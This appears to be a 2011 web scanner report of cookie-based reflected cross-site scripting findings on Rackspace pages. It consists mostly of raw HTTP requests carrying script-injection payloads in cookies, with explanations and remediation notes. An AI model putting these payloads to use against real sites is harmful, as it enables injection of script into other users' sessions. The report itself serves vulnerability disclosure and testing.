gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ed39"><script>alert(1)</script>fa749f42c46 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/support/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f81ed39"><script>alert(1)</script>fa749f42c46; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14dcd"%3balert(1)//4f10668ea74 was submitted in the chatslider cookie. This input was echoed as 14dcd";alert(1)//4f10668ea74 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/support/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D14dcd"%3balert(1)//4f10668ea74; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9410"><script>alert(1)</script>a2d67b75440 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/support/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dc9410"><script>alert(1)</script>a2d67b75440; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7974"><script>alert(1)</script>818142f1e24 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /aboutus/contact/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Db7974"><script>alert(1)</script>818142f1e24; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:26 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 39350
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdfd9"%3balert(1)//b2cda283735 was submitted in the chatslider cookie. This input was echoed as cdfd9";alert(1)//b2cda283735 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aboutus/contact/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Dcdfd9"%3balert(1)//b2cda283735; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 39216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17eb3"%3balert(1)//28c87ae40e2 was submitted in the chatslider cookie. This input was echoed as 17eb3";alert(1)//28c87ae40e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aboutus/events/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D17eb3"%3balert(1)//28c87ae40e2; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 44068
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55b26"><script>alert(1)</script>65525cea6aa was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /aboutus/events/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D55b26"><script>alert(1)</script>65525cea6aa; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 44090
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4627b"><script>alert(1)</script>32c126ded98 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /aboutus/story/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D4627b"><script>alert(1)</script>32c126ded98; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:17 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 38614
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86a93"%3balert(1)//3b3b8c9a118 was submitted in the chatslider cookie. This input was echoed as 86a93";alert(1)//3b3b8c9a118 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aboutus/story/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D86a93"%3balert(1)//3b3b8c9a118; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:21 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 38574
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 345f6"><script>alert(1)</script>5da5d11340d was submitted in the chatslider cookie. This input was echoed as 345f6\"><script>alert(1)</script>5da5d11340d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /blog/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D345f6"><script>alert(1)</script>5da5d11340d; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e7e2</script><script>alert(1)</script>cbd048d273a was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D4e7e2</script><script>alert(1)</script>cbd048d273a; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75ec3</script><script>alert(1)</script>29f4d6a2425 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/2010/12/14/rackspace-will-take-care-of-your-cloud-while-you-manage-your-business/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D75ec3</script><script>alert(1)</script>29f4d6a2425; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76b71"><script>alert(1)</script>a0a96c4691f was submitted in the chatslider cookie. This input was echoed as 76b71\"><script>alert(1)</script>a0a96c4691f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /blog/2010/12/14/rackspace-will-take-care-of-your-cloud-while-you-manage-your-business/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D76b71"><script>alert(1)</script>a0a96c4691f; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd5fa"><script>alert(1)</script>434fc0e542 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cloudU HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-5-2_4--5+6--5_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296919127_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Ddd5fa"><script>alert(1)</script>434fc0e542; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.7.10.1296919128;
Response (redirected)
